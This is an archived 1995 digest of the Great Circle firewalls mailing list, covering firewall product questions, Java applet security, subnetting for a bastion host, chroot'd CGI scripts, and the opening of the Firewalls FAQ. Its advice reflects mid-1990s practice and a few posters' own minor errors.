18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 506 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk | I'm looking for comments and experiences with IBMs NetSP, Secured Network | Gateway version 1.2. How does it compare to other products like BorderWare and | FireWall-1? I haven't seen version 1.2, but version one had some serious holes, including sendmail, and lacked any sort of self-integrity checker. Any security person worth their salt can fix both, but wy not start with a product that works? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Fri Sep 15 11:03:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA14210 for firewalls-outgoing; Fri, 15 Sep 1995 10:41:06 -0700 Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA14186 for ; Fri, 15 Sep 1995 10:40:59 -0700 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id KAA18421; Fri, 15 Sep 1995 10:38:46 -0700 Received: from scndprsn.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA20443; Fri, 15 Sep 1995 10:38:17 -0700 Received: from pepper.Eng.Sun.COM by scndprsn.Eng.Sun.COM (5.x/SMI-SVR4) id AA14016; Fri, 15 Sep 1995 10:37:47 -0700 Received: by pepper.Eng.Sun.COM (5.x/SMI-SVR4) id AA19548; Fri, 15 Sep 1995 10:38:42 -0700 Date: Fri, 15 Sep 1995 10:38:42 -0700 From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis) Message-Id: <9509151738.AA19548@pepper.Eng.Sun.COM> To: firewalls@greatcircle.com Subject: Re: I wish Java would go away ... Cc: scott@Disclosure.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi folks, me again, Java guy. Thought I'd stop by for a moment to answer Scott's email and offer some concrete suggestions. First, understand that I work on Java so the truely paranoid should distrust everything I say :-) Scott writes: > I was wondering if anyone has done a security analysis of allowing Java > applets behind a firewall? And the answer is of course yes. We plan to have a more thorough security analysis paper available for FCS. In the meantime we welcome other analyses and comments. > I finally got to see some documentation and (a) I am not impressed > (Sun has this nack for doing neat things the wrong way--private email > if you want to discuss this), I think private email is probably the wrong way to go. What you should do is express your concerns publically to the java-interest@java.sun.com alias. That way we can address/fix them. If you are uncomfortable doing that, you are more than welcome to discuss them with me privately. We can turn any legitimate concern into "showstopper" bugs that will prevent the release of 1.0 until they are fixed. If you have been following Java you will notice that the window stuff changed _radically_ between alpha and pre-Beta. This was in a large part response to what people on the lists were requiring. > (b) I saw a lot of stuff regarding these applets and Unix, but what > if the client machines are pee cees? > The NT and Windoze 95 weenies are jumping up and down going "oooo neat!" > I'm still responding "oy vey!" :-) Interestingly enough the language is the same on PCs as it is on UNIX. It is still impossible to express a virus in Java, and it is still impossible to cons up some illegal byte codes and have them executed by the virtual machine on the other end. If you have any specific concerns I can address then please feel free to write or post to the java lists. > I need feed back from anyone who has run or evaluated it with security > in mind. Besides Sun's propoganda, are there any documents on the net > I can pick up that comments on it, pro or con? We at Sun would like your analyses as well. It does everyone a great disservice to "discover" some hole that we have not and then not tell us about it. The idea here is to provide a solid, secure, foundation for doing interactive content. That is why a) Alpha has been so long, b) we release the source so that *every* question can be answered by personal investigation if you choose, and c) people like me solicit your input. > On more important item... can anyone compare and contrast what Sun is > doing vs. SGI's web stuff for both its technical merrit and security? I'm from Sun so discount this comment but from what I've been able to gather "SGI's web stuff" consists of some third party ports of bits of web software and a marketing campaign called "WebForce". If there is actually anything new or novel in their "stuff" I'd like to know what it is. --Chuck From firewalls-owner Fri Sep 15 11:31:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15733 for firewalls-outgoing; Fri, 15 Sep 1995 11:10:39 -0700 Received: from spunky.RedBrick.COM (spunky.RedBrick.COM [192.83.206.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA15726 for ; Fri, 15 Sep 1995 11:10:33 -0700 Received: from goofy.RedBrick.COM (goofy.RedBrick.COM [192.83.206.167]) by spunky.RedBrick.COM (8.6.12/mailhost-1.6) with ESMTP id LAA24491 for ; Fri, 15 Sep 1995 11:09:18 -0700 Received: from blazer (blazer.RedBrick.COM [192.83.206.183]) by goofy.RedBrick.COM (8.6.12/client-solaris2-1.4) with SMTP id LAA11295 for ; Fri, 15 Sep 1995 11:09:16 -0700 Message-Id: <199509151809.LAA11295@goofy.RedBrick.COM> X-Sender: dwaters@spunky.redbrick.com X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 15 Sep 1995 11:00:18 -0700 To: firewalls@GreatCircle.COM From: Dean Waters Subject: 5 bit subnet for Bastion Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't know if this is the proper place for this but I will give it a try. I am setting up a Livingston Firewall router and want to use only a small portion of one of our subnets for the unprotected host/hosts. It has been suggested that I use a 5-bit subnet for this. Is this feasible? If so does that mean I would use 1-32 for hosts on that subnet? Then what subnet mask would I use. Thanks for the help -- Dean Waters E-mail: dwaters@RedBrick.COM System Administrator Red Brick Systems Phone: 408-399-7103 Los Gatos, CA Pager: 408-788-5818 From firewalls-owner Fri Sep 15 12:01:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18035 for firewalls-outgoing; Fri, 15 Sep 1995 11:53:18 -0700 Received: from ki1.chemie.fu-berlin.de (ki1.Chemie.FU-Berlin.DE [160.45.24.21]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA18027 for ; Fri, 15 Sep 1995 11:53:11 -0700 Received: by ki1.chemie.fu-berlin.de (Smail3.1.28.1) from odb.rhein-main.de (193.141.47.4) with smtp id ; Fri, 15 Sep 95 20:51 MEST Received: from [193.141.47.129] by odb.rhein-main.de with smtp (Smail3.1.28.1 #5) id m0stfrJ-0007SSC; Fri, 15 Sep 95 20:51 MET DST X-Sender: maass@odb.rhein-main.de Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Fri, 15 Sep 1995 20:58:47 +0200 To: Craig McLellan From: maass@thinkfish.rhein-main.de (Joerg Maass) Subject: Re: Does anyone do remote monitoring Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Craig, >I have a customer who is looking for any firms that provide remote security >monitoring. Anyone know of this??? > Check out Polycenter Security Intrusion Detector and Security Compliance Manager from Digital Equipment. Client server based and runs on a variety of platforms. http://www.digital.com/ Please don=B4t mail me for more information, since I=B4ll be on holiday from next Monday on :-). Kind regards Joerg Maass -- Am Tiergarten 22 Tel.: +49/69/4990880 D-60316 Frankfurt Fax : +49/6103/383-157 Germany privat: maass@thinkfish.rhein-main.de biz.: Joerg.Maass@frs.mts.dec.com PGP signature available upon request. From firewalls-owner Fri Sep 15 12:48:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA17504 for firewalls-outgoing; Fri, 15 Sep 1995 11:43:26 -0700 Received: from dub-img-5.compuserve.com (dub-img-5.compuserve.com [198.4.9.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA17477 for ; Fri, 15 Sep 1995 11:43:19 -0700 Received: by dub-img-5.compuserve.com (8.6.10/5.950515) id OAA25151; Fri, 15 Sep 1995 14:42:05 -0400 Date: 15 Sep 95 14:34:53 EDT From: matt <100632.1345@compuserve.com> To: firewalls-mailing-list Subject: re:firewall with only one ip-address??? Message-ID: <950915183453_100632.1345_BHL153-1@CompuServe.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, first we would like to thank you for all the replies we got. Most of them were very useful, however we didn't understand some critics for not using a whole class C net. But some of you answered them very fine, there is nothing to add! We even thank for a few commercial offers, but we don't want to use commercial products for several reasons. Briefly, here is our solution: We have contacted our provider, and we got a second IP address. So we could build like this: ----------- | | | internet | | | ----------- | |ISDN ----------- ----------- ----------- | |a.b.c.d a.b.c.e| |10.1.1.1 | | | router |-----------------| firewall |----------|private net| | PC | | UNIX | | 10.x.y.z | ----------- ----------- ----------- Our IP addresses are already in use, but it will take a few weeks until a.b.c.e can be translated to our hostname, so we cannot receive emails yet. But we have already tested services like ftp, telnet, WWW, news, and it works ok. The router uses the KA9Q routing software, and the firewall is running the TIS fwtk toolkit. They seem to be really good tools! Thanx again for your support, matt rolf From firewalls-owner Fri Sep 15 13:09:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA16925 for firewalls-outgoing; Fri, 15 Sep 1995 11:32:10 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA16918 for ; Fri, 15 Sep 1995 11:32:06 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id NAA28749 for GreatCircle.COM!firewalls; Fri, 15 Sep 1995 13:23:51 -0500 Received: by ris1.nmti.com (smail2.5) id AA12469; 15 Sep 95 12:11:38 CDT (Fri) Received: by sonic.nmti.com; id AA10956; Fri, 15 Sep 1995 12:38:17 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509151738.AA10956@sonic.nmti.com.nmti.com> Subject: Re: Mulitple levels of security (was Secure version of sendmail) To: mdr@vodka.sse.att.com Date: Fri, 15 Sep 1995 12:38:17 -0500 (CDT) Cc: peter@nmti.com, firewalls@GreatCircle.COM In-Reply-To: <9509151404.AA16148@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Sep 15, 95 10:01:24 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1116 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > True, applications programmers can get lazy, and even the best ones > may not have security in mind. That makes the secure OS *more* > valuable not less. Are you trying to imply that they will be lazier > because they trust a secure OS more? That's exactly what I'm saying. Its like they're using a PC and you install a virus checker on the PC lan and all of a sudden all these new applications show up. You're probably *more* likely to get a virus. > The lazy ones can't get any worse. It's not that they're lazy. It's that they're energetic but not interested in security. They haven't put IRC on their firewall yet because it's not "safe", but now you've put a B level system under them they will. > If the weren't thinking about security under C1(no security) they won't > bother to think less about it under B level security. D is no security. C1 is discretionary access control. C2 mostly adds auditing. And, yes, they will think less about security under B level because they think they're OK. I've seen it happen too many times... not this specific example, but others that are pretty similar. From firewalls-owner Fri Sep 15 13:31:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23362 for firewalls-outgoing; Fri, 15 Sep 1995 13:06:54 -0700 Received: from intex.intex.net (intex.intex.net [204.255.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23340 for ; Fri, 15 Sep 1995 13:06:49 -0700 Received: from dialupb56.intex.net (dialupb56.intex.net [204.255.103.56]) by intex.intex.net (8.6.12/4.1.4) with SMTP id PAA23234; Fri, 15 Sep 1995 15:04:14 -0500 Message-Id: <199509152004.PAA23234@intex.intex.net> X-Sender: lpierce@intex.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 15 Sep 1995 15:16:54 -0500 To: Dean Waters , firewalls@GreatCircle.COM From: lpierce@intex.net (S. Lane Pierce) Subject: Re: 5 bit subnet for Bastion Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:00 AM 9/15/95 -0700, Dean Waters wrote: >I don't know if this is the proper place for this but I will give it a try. > >I am setting up a Livingston Firewall router and want to use only a small >portion of one of our subnets for the unprotected host/hosts. It has been >suggested that I use a 5-bit subnet for this. Is this feasible? If so does >that mean I would use 1-32 for hosts on that subnet? Then what subnet mask >would I use. [.sig snipped] Dean- You should have no problem with this. A 5 bit subnet mask for a class C network would be 255.255.255.248. This will yield 32 network address with 6 hosts per address (will some one check my math :) ) Tablized this would look like: Network Host Broadcast ~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~ 254.254.254.0 254.254.254.1 - 6 254.254.254.7 254.254.254.8 254.254.254.9 - 14 254.254.254.15 254.254.254.16 254.254.254.17 - 22 254.254.254.23 .... You get the picture. This subnet mask (255.255.255.248) looks like this: 11111111.11111111.11111111.11111000 Where 29 bits are used for the network and 3 bits are used for the host. Good luck, S. Lane Pierce lpierce@intex.net From firewalls-owner Fri Sep 15 13:32:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA18740 for firewalls-outgoing; Fri, 15 Sep 1995 12:00:30 -0700 Received: from sar.net (chajul.sar.net [200.13.64.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA06923 for ; Tue, 12 Sep 1995 21:41:01 -0700 From: mramirez@imparcial.com.mx Received: from imparnet.imparcial.com.mx by sar.net via SMTP (940816.SGI.8.6.9/940406.SGI) for id WAA18617; Tue, 12 Sep 1995 22:39:43 -0600 Date: Tue, 12 Sep 1995 22:39:43 -0600 Received: from sistemas.imparcial.com.mx by imparnet.imparcial.com.mx id aa03486; 12 Sep 95 21:14 MST Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable To: firewalls@greatcircle.com Subject: Help with CISCO 2511 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 FAX)= . I=B4m having problems trying to configure the receiving modems to support 14,400 bps from the callers. Actually my users only can connect to the modems at 9600 bps, and the technical support from CISCO told me that I have to change my modems to 28,800 bps, that=B4s the only way that my receiving modems can receive calls at 14,400 bps. It=B4s true?? , because I think that is some problem with the configuration of the CISCO (in dedicated or interactive mode) Thanks.. From firewalls-owner Fri Sep 15 13:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA20051 for firewalls-outgoing; Fri, 15 Sep 1995 12:17:46 -0700 Received: from hawksbill.sprintmrn.com (hawksbill.sprintmrn.com [199.11.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA20026 for ; Fri, 15 Sep 1995 12:17:38 -0700 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA03959; Fri, 15 Sep 95 15:15:36 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9509152015.AA03959@hawksbill.sprintmrn.com> Subject: Re: 5 bit subnet for Bastion To: dwaters@RedBrick.COM (Dean Waters) Date: Fri, 15 Sep 1995 15:15:36 -0500 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509151809.LAA11295@goofy.RedBrick.COM> from "Dean Waters" at Sep 15, 95 11:00:18 am X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 1072 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I don't know if this is the proper place for this but I will give it a try. > No, but what the hell. :-) > I am setting up a Livingston Firewall router and want to use only a small > portion of one of our subnets for the unprotected host/hosts. It has been > suggested that I use a 5-bit subnet for this. Is this feasible? If so does > that mean I would use 1-32 for hosts on that subnet? Then what subnet mask > would I use. > > A 5 bit mask (255.255.255.248 with a classful 'c' network address) would yield 30 useable subnets with 6 useable hosts on each subnet. Unless you decide to use IP subnet 0, then the first subnet would remain 'reserved' and the first useable host address would be .9. - paul _______________________________________________________________________________ Paul Ferguson Dulcius Ex Asperis US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Fri Sep 15 13:40:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA18868 for firewalls-outgoing; Fri, 15 Sep 1995 12:01:55 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA18860 for ; Fri, 15 Sep 1995 12:01:52 -0700 Received: from moat.pweh.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id LAA12423; Fri, 15 Sep 1995 11:54:15 -0700 Received: (from uucp@localhost) by moat.pweh.com (8.6.10/8.6.10) id OAA19602 for ; Fri, 15 Sep 1995 14:58:47 -0400 Received: from unknown(191.29.71.250) by moat.pweh.com via smap (V1.3) id sma019599; Fri Sep 15 14:58:28 1995 Received: (from uucp@localhost) by drawbridge.eh.pweh.com (8.6.10/8.6.10) id OAA21247 for ; Fri, 15 Sep 1995 14:58:27 -0400 Received: from pweh009.eh.pweh.com(191.29.73.105) by drawbridge.eh.pweh.com via smap (V1.3) id sma021241; Fri Sep 15 14:58:09 1995 Received: from pwa-b.eh.pweh.com by pweh009.eh.pweh.com (4.1/SMI-4.1) id AA12832; Fri, 15 Sep 95 14:58:08 EDT Received: by pwa-b.eh.pweh.com (5.64/8.6.9) id AA04747 for firewalls@greatcircle.com; Fri, 15 Sep 95 14:53:45 -0400 Date: Fri, 15 Sep 95 14:53:45 -0400 From: miorelli@pweh.com (BoB Miorelli) Message-Id: <9509151853.AA04747@pwa-b.eh.pweh.com> To: firewalls@greatcircle.com Subject: Running an application through a firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have been tasked with allowing a rather ugly scenario through our firewall. This is a client/server application with the client at a customer site and the server (a database server) at our site. The database contains proprietary data that should not be seen by unauthorized individuals. We have a dual firewall system with a choke router between them, both firewall machines running TIS. This is a very complex application and writing a server that runs on the firewall or other machine outside the firewall that would pass requests in through the firewall seems a bit too much. Has anyone had a similar request and has a reasonable solution?? The application in mind is IBM's 'Product Manager'. Any help will be appreciated. -->BoB Miorelli, Pratt & Whitney miorelli@pweh.com From firewalls-owner Fri Sep 15 13:48:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA21431 for firewalls-outgoing; Fri, 15 Sep 1995 12:36:21 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA21410 for ; Fri, 15 Sep 1995 12:36:02 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA10245; Fri, 15 Sep 1995 15:34:39 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA01999; Fri, 15 Sep 1995 15:34:33 -0400 Message-Id: <9509151934.AA01999@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com Date: Fri, 15 Sep 1995 15:33:23 -0500 Subject: Re: WWW - http - cgi_scripts Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rumour has it that on 15 Sep 95 at 10:00, long-morrow@CS.YALE.EDU said: > > Also, consider running your httpd chroot()d so that the CGI > scripts have to run in this virtual "jail" as well. > > It can be a pain (you have to make sure that anything that CGI programs needs -- > shared libraries, perl interpreter and library modules -- exists within the > chroot()d hierarchy, but it should help to contain a CGI program gone haywire > (or one that an external WWW user attempted to trick and hijack). > > We run a number of CGI programs in a chroot()d environment. Although this is the kind of config that I prefer to use, I'll mention (for those who haven't already figured it out) that whatever you put in the chroot()d hierarchy could possibly be used against you. For example, if you have sybperl in the chroot()d environment in order to connect to an internal Sybase database, it follows then that a hacker has all the pieces necessary to punch a hole into your trusted network (assuming they are able to break into the chroot()d area in the first place). I only mention sybperl since the necessary network device files would exist to facilitate the client-server connection. Of course, as has been mentioned earlier, if the hacker is able to mknod whatever device special files, then perl alone would be sufficiently deadly. For the paranoid, it's worth undumping and creating standalone executable perl programs and avoiding installing full-blown perl into the chroot()d hierarchy. This usually translates into your exposed Web server becoming a production system and you have another system internally for mucking around. But I digress. If anybody is thinking of dredging up that old "the paranoid should never leave anything on the bastion which could be used against you, period," don't bother, because I just did. ;) -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## The more I learn, the less I know. ## ## Eventually I'll know everything about nothing. ## From firewalls-owner Fri Sep 15 13:57:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19306 for firewalls-outgoing; Fri, 15 Sep 1995 12:07:52 -0700 Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA16282 for ; Wed, 13 Sep 1995 18:28:52 -0700 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id VAA16851; Wed, 13 Sep 1995 21:51:28 -0400 Date: Wed, 13 Sep 1995 21:51:28 -0400 Message-Id: <199509140151.VAA16851@switchblade.iwi.com> From: fwalls-faq@tis.com To: firewalls@greatcircle.com Reply-To: fwalls-faq@tis.com Subject: Firewalls FAQ (Rev 8, updated Wed Sep 13 21:50:35 1995) Distribution: world Content-Type: text X-Posting-Frequency: first day of the month Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Internet Firewalls Frequently Asked Questions FAQ Maintainer: Marcus J. Ranum About the FAQ This FAQ is not an advertisement or endorsement for any product, company, or consultant. The maintainer welcomes input and comments on the contents of this FAQ. Comments related to the FAQ should be addressed to Fwalls-FAQ@iwi.com. The FAQ is also available via WWW from http://www.iwi.com. As of this writing, the FAQ's primary format is HTML. Contents: 1. What is a network firewall? 2. Why would I want a firewall? 3. What can a firewall protect against? 4. What can't a firewall protect against? 5. What about virusses? 6. What are good sources of print information on firewalls? 7. Where can I get more information on firewalls on the network? 8. What are some commercial products or consultants who sell/service firewalls? 9. What are some of the basic design decisions in a firewall? 10. What are some of the basic types of firewall? 11. What are proxy servers and how do they work? 12. What are some cheap packet screening tools? 13. What are some reasonable filtering rules for a Cisco? 14. How do I make Web/http work with a firewall? 15. How do I make DNS work with a firewall? 16. How do I make FTP work through my firewall? 17. How do I make Telnet work through my firewall? 18. How do I make Finger and whois work through my firewall? 19. How do I make gopher, archie, and other services work through my firewall? 20. What are the issues about X-Window through a firewall? 21. What is source routed traffic and why is it a threat? 22. What are ICMP redirects and redirect bombs? 23. What about denial of service? 24. Glossary of firewall related terms 25. Contributors What is a network firewall? A firewall is a system or group of systems that enforces an access control policy between two networks. The actual means by which this is accomplished varies widely, but in principle, the firewall can be thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic. Probably the most important thing to recognize about a firewall is that it implements an access control policy. If you don't have a good idea what kind of access you want to permit or deny, or you simply permit someone or some product to configure a firewall based on what they or it think it should do, then they are making policy for your organization as a whole. Why would I want a firewall? The Internet, like any other society, is plagued with the kind of jerks who enjoy the electronic equivalent of writing on other people's walls with spraypaint, tearing their mailboxes off, or just sitting in the street blowing their car horns. Some people try to get real work done over the Internet, and others have sensitive or proprietary data they must protect. Usually, a firewall's purpose is to keep the jerks out of your network while still letting you get your job done. Many traditional-style corporations and data centers have computing security policies and practices that must be adhered to. In a case where a company's policies dictate how data must be protected, a firewall is very important, since it is the embodiment of the corporate policy. Frequently, the hardest part of hooking to the Internet, if you're a large company, is not justifying the expense or effort, but convincing management that it's safe to do so. A firewall provides not only real security - it often plays an important role as a security blanket for management. Lastly, a firewall can act as your corporate "ambassador" to the Internet. Many corporations use their firewall systems as a place to store public information about corporate products and services, files to download, bug-fixes, and so forth. Several of these systems have become important parts of the Internet service structure (e.g.: UUnet.uu.net, whitehouse.gov, gatekeeper.dec.com) and have reflected well on their organizational sponsors. What can a firewall protect against? Some firewalls permit only Email traffic through them, thereby protecting the network against any attacks other than attacks against the Email service. Other firewalls provide less strict protections, and block services that are known to be problems. Generally, firewalls are configured to protect against unauthenticated interactive logins from the "outside" world. This, more than anything, helps prevent vandals from logging into machines on your network. More elaborate firewalls block traffic from the outside to the inside, but permit users on the inside to communicate freely with the outside. The firewall can protect you against any type of network-borne attack if you unplug it. Firewalls are also important since they can provide a single "choke point" where security and audit can be imposed. Unlike in a situation where a computer system is being attacked by someone dialing in with a modem, the firewall can act as an effective "phone tap" and tracing tool. Firewalls provide an important logging and auditing function; often they provide summaries to the administrator about what kinds and amount of traffic passed through it, how many attempts there were to break into it, etc. What can't a firewall protect against? Firewalls can't protect against attacks that don't go through the firewall. Many corporations that connect to the Internet are very concerned about proprietary data leaking out of the company through that route. Unfortunately for those concerned, a magnetic tape can just as effectively be used to export data. Many organizations that are terrified (at a management level) of Internet connections have no coherent policy about how dial-in access via modems should be protected. It's silly to build a 6-foot thick steel door when you live in a wooden house, but there are a lot of organizations out there buying expensive firewalls and neglecting the numerous other back-doors into their network. For a firewall to work, it must be a part of a consistent overall organizational security architecture. Firewall policies must be realistic, and reflect the level of security in the entire network. For example, a site with top secret or classified data doesn't need a firewall at all: they shouldn't be hooking up to the internet in the first place, or the systems with the really secret data should be isolated from the rest of the corporate network. Another thing a firewall can't really protect you against is traitors or idiots inside your network. While an industrial spy might export information through your firewall, he's just as likely to export it through a telephone, FAX machine, or floppy disk. Floppy disks are a far more likely means for information to leak from your organization than a firewall! Firewalls also cannot protect you against stupidity. Users who reveal sensitive information over the telephone are good targets for social engineering; an attacker may be able to break into your network by completely bypassing your firewall, if he can find a "helpful" employee inside who can be fooled into giving access to a modem pool. What about virusses? Firewalls can't protect very well against things like viruses. There are too many ways of encoding binary files for transfer over networks, and too many different architectures and viruses to try to search for them all. In other words, a firewall cannot replace security- consciousness on the part of your users. In general, a firewall cannot protect against a data-driven attack -- attacks in which something is mailed or copied to an internal host where it is then executed. This form of attack has occurred in the past against various versions of Sendmail and GhostScript, a freely-available PostScript viewer. Organizations that are deeply concerned about virusses should implement organization-wide virus control measures. Rather than trying to screen virusses out at the firewall, make sure that every vulnerable desktop has virus scanning software that is run when the machine is rebooted. Blanketting your network with virus scanning software will protect against virusses that come in via floppy disks, modems, and Internet. Trying to block virusses at the firewall will only protect against virusses from the Internet - and the vast majority of virusses are caught via floppy disks. What are good sources of print information on firewalls? There are several books that touch on firewalls. The best known are: * Title: Firewalls and Internet Security: Repelling the Wily Hacker Authors: Bill Cheswick and Steve Bellovin Publisher: Addison Wesley Edition: 1994 ISBN: 0-201-63357-4 * Title: Building Internet Firewalls Authors: D. Brent Chapman and Elizabeth Zwicky Publisher: O'Reilly Edition: 1951 ISBN: 1-56592-124-0 * Title: Practical Unix Security Authors: Simson Garfinkel and Gene Spafford Publisher: O'Reilly Edition: 1991 ISBN: 0-937175-72-2 (discusses primarily host security) Related references are: * Titles: Internetworking with TCP/IP Vols I, II and III Authors: Douglas Comer and David Stevens Publisher: Prentice-Hall Edition: 1991 ISBN: 0-13-468505-9 (I), 0-13-472242-6 (II), 0-13-474222-2 (III) Comment: A detailed discussion on the architecture and implementation of the Internet and its protocols. Vol I (on principles, protocols and architecture) is readable by everyone, Vol 2 (on design, implementation and internals) is more technical, and Vol 3 (on client-server computing) is recently out. * Title: Unix System Security - A Guide for Users and System Administrators Author: David Curry Publisher: Addision Wesley Edition: 1992 ISBN: 0-201-56327-4 Where can I get more information on firewalls on the network? * Ftp.greatcircle.com - Firewalls mailing list archives. Directory: pub/firewalls * Ftp.tis.com - Internet firewall toolkit and papers. Directory: pub/firewalls * Research.att.com - Papers on firewalls and breakins. Directory: dist/internet_security * Net.Tamu.edu - Texas AMU security tools. Directory: pub/security/TAMU * iwi.com - Internet attacks presentation, firewall standards The internet firewalls mailing list is a forum for firewall administrators and implementors. To subscribe to Firewalls, send "subscribe firewalls" in the body of a message (not on the "Subject:" line) to "Majordomo@GreatCircle.COM". Archives of past Firewalls postings are available for anonymous FTP from ftp.greatcircle.com in pub/firewalls/archive What are some commercial products or consultants who sell/service firewalls? We feel this topic is too sensitive to address in a FAQ, however, an independantly maintained list (no warrantee or recommendations are implied) can be found at URL: http://www.access.digex.net/~bdboyle/firewall.vendor.html What are some of the basic design decisions in a firewall? There are a number of basic design issues that should be addressed by the lucky person who has been tasked with the responsibility of designing, specifying, and implementing or overseeing the installation of a firewall. The first and most important is reflects the policy of how your company or organization wants to operate the system: is the firewall in place to explicitly deny all services except those critical to the mission of connecting to the net, or is the firewall in place to provide a metered and audited method of "queuing" access in a non-threatening manner. There are degrees of paranoia between these positions; the final stance of your firewall may be more the result of a political than an engineering decision. The second is: what level of monitoring, redundancy, and control do you want? Having established the acceptable risk level (e.g.: how paranoid you are) by resolving the first issue, you can form a checklist of what should be monitored, permitted, and denied. In other words, you start by figuring out your overall objectives, and then combine a needs analysis with a risk assessment, and sort the almost always conflicting requirements out into a laundry list that specifies what you plan to implement. The third issue is financial. We can't address this one here in anything but vague terms, but it's important to try to quantify any proposed solutions in terms of how much it will cost either to buy or to implement. For example, a complete firewall product may cost between $100,000 at the high end, and free at the low end. The free option, of doing some fancy configuring on a Cisco or similar router will cost nothing but staff time and cups of coffee. Implementing a high end firewall from scratch might cost several man- months, which may equate to $30,000 worth of staff salary and benefits. The systems management overhead is also a consideration. Building a home-brew is fine, but it's important to build it so that it doesn't require constant and expensive fiddling-with. It's important, in other words, to evaluate firewalls not only in terms of what they cost now, but continuing costs such as support. On the technical side, there are a couple of decisions to make, based on the fact that for all practical purposes what we are talking about is a static traffic routing service placed between the network service provider's router and your internal network. The traffic routing service may be implemented at an IP level via something like screening rules in a router, or at an application level via proxy gateways and services. The decision to make is whether to place an exposed stripped-down machine on the outside network to run proxy services for telnet, ftp, news, etc., or whether to set up a screening router as a filter, permitting communication with one or more internal machines. There are plusses and minuses 